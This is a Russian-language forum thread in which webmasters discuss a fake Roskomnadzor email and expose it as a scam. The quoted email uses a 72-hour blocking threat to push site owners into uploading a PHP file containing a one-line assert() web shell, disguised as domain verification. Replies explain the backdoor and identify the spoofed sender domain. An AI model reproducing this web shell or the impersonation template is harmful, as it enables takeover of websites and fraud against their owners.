sheynhjk

Письмо от Роскомнадзора

22 posts in this topic

Всем доброго...

Получил письмо следующего содержания:

Самое интересное, что посещаемость иногда переваливает за 2000 но 3000 не было ни разу, Как это понимать?

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени *************** в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015, Ваш сайт **************** был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени ****************, Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку re****
2. Cоздать в данной папке файл re*****-id12****.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени ***************/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>*В < ?php необходимо убрать пробел между < и ?phpПуть до файла на Вашем сайте должен получиться следующий: ***************/re****/re*****-id12*****.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени ************, следую инструкции указанной выше, то Ваш сайт ************** будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

1. Кто сталкивался?

2. Что делать?

3. Какие последствия?

Функция assert() выполнит PHP-код, переданный в адресной строке при вызове скрипта. Другими словами злоумышленник таким образом получает возможность на практически любые действия с вашей площадкой сайта. Разумеется, это обманное письмо, фейк, и подобные требования ни в коем случае выполнять нельзя.

Адрес отправителя "пробить " не пытались?  С какого адреса отправлено письмо?

привет. если закачал срочно удали,или чисти уже  сайт. мине приходило такое.я им туда написал для выяснения обстоятельств. пришел ответ 

http://prntscr.com/89kkwq

нашел по теме 

http://habrahabr.ru/post/265513/

sheynhjk likes this

100000 раз уже на форуме писали про эту тему, пользуйтесь поиском хотябы

Большое Вам спасибо! Я подозревал, что развод, но все же опасался =)

Точно, сверил адреса, настоящий: zapret-info-out@rkn.gov.ru

Липа с которой мне пришло: zapret-info@roskomnadzor.org (ну уж очень правдоподобно выглядит!

100000 раз уже на форуме писали про эту тему, пользуйтесь поиском хотябы

Да хватить бубанить и сообщения набивать! я искал, не нашел, поэтому и спросил, нормальные люди ответили, спасибом ответил, а Вы много на себя берете уважаемый!

Я как понимаю, они данные по посещалке из рейтинга ливинтернет берут. Мне тоже самое приходило. Послал их к чертям

Я как понимаю, они данные по посещалке из рейтинга ливинтернет берут. Мне тоже самое приходило. Послал их к чертям

Неа)) Мне на сайт с трафиком 1300-1400 пришло письмо, при этом стоит только метрика, посылают всем подряд ).

Липа с которой мне пришло: zapret-info@roskomnadzor.org (ну уж очень правдоподобно выглядит!

Нисколько не правдоподобно )))

Тенденция: в России сегодня даже все личные данные переводят на российские серверы.

А письмо Вам приходит с сайта в международной зоне    .org  - где логика?  :D

Какое отношение эта зона может иметь к российским организациям госуровня? ;)

rafonets and PizzaHut like this

Нисколько не правдоподобно )))

Тенденция: в России сегодня даже все личные данные переводят на российские серверы.

А письмо Вам приходит с сайта в международной зоне    .org  - где логика?  :D

Какое отношение эта зона может иметь к российским организациям госуровня? ;)

roskomnadzor-gov.org

Согласен, хоть бы GOV добавили), org  - организация, еще более или менее было бы). Видимо кому-то в голову пришло, а реализация так себе)).

webostrov likes this

Все претензии присылают через хостера или регистратора домена, а не через обратную связь на сайте или прямиком на почту. :D

Интересная тема, надо себе тоже доменное имя с roskomnadzor приобрести и прикрутить почту  :)

Хорошо, что быстро разобрались :) На будущее: без gov ничто не выглядит правдоподобным.

И в США, и в России gov означает правительственную организацию.

pravo.gov.ru

gossluzhba.gov.ru

programs.gov.ru

zakupki.gov.ru

fms.gov.ru

Просто так добавить .gov нельзя. Доменное имя с точкой попросту не зарегистрируют.

Кстати, нам хостер разослал письма с предупреждением об этой афере. Сайты взламывают таким образом.

А вообще, вот эта фраза угрожающая шедевральна «Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени...» вас заблокируют на веки вечные :D А за что блокировать сайт, если письмо направили постороннему лицу, не сумевшему доказать, что это его доменное имя? Косячок тут у них. Но расчет правильный: мы же привыкли проходить процедуру добавления meta, чтобы доказать право владения сайтом. И многие не колеблясь добавили (раз уж хостеру пришлось письма слать).

Если интересно, то вот как выглядит реальное письмо, за которым следует блокирвка  :D

Информируем Вас, что определением Московского городского суда от 15.06.2015 были приняты предварительные обеспечительные меры защиты в отношении следующих объектов авторских и (или) смежных прав (кроме фотографических произведений и произведений, полученных способами, аналогичными фотографии):
...

Вместе с тем, по результатам мониторинга ресурса сайт.ру было установлено, что указанный(ые) объект(ы) авторского и (или) смежного права распространяются по следующим указателям страниц сайта в сети «Интернет»: шттп://злостный-нарушитель.рю/уолтер_уайт_ни_в_чем_не_виноват

Обращаем внимание, что неисполнение определения Московского городского суда, выразившееся в непринятии мер по удалению информации, размещенной на информационных ресурсах с нарушением авторских и (или) смежных прав, а также в отказе ограничивать доступ к такой информации, является основанием для направления сведений об информационном ресурсе операторам связи в целях ограничения доступа к ресурсу, в том числе и по его сетевому адресу (IP-адресу).

Рекомендуем прекратить создание технических условий, обеспечивающих размещение, распространение и иное использование вышеуказанных объектов авторского и (или) смежного права без разрешения правообладателя, и сообщить о принятых мерах.

С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ

Мегня вот какой вопрос волнует по данному факту  - А сколько владельцев всё же клюнуло на эту штуку? )))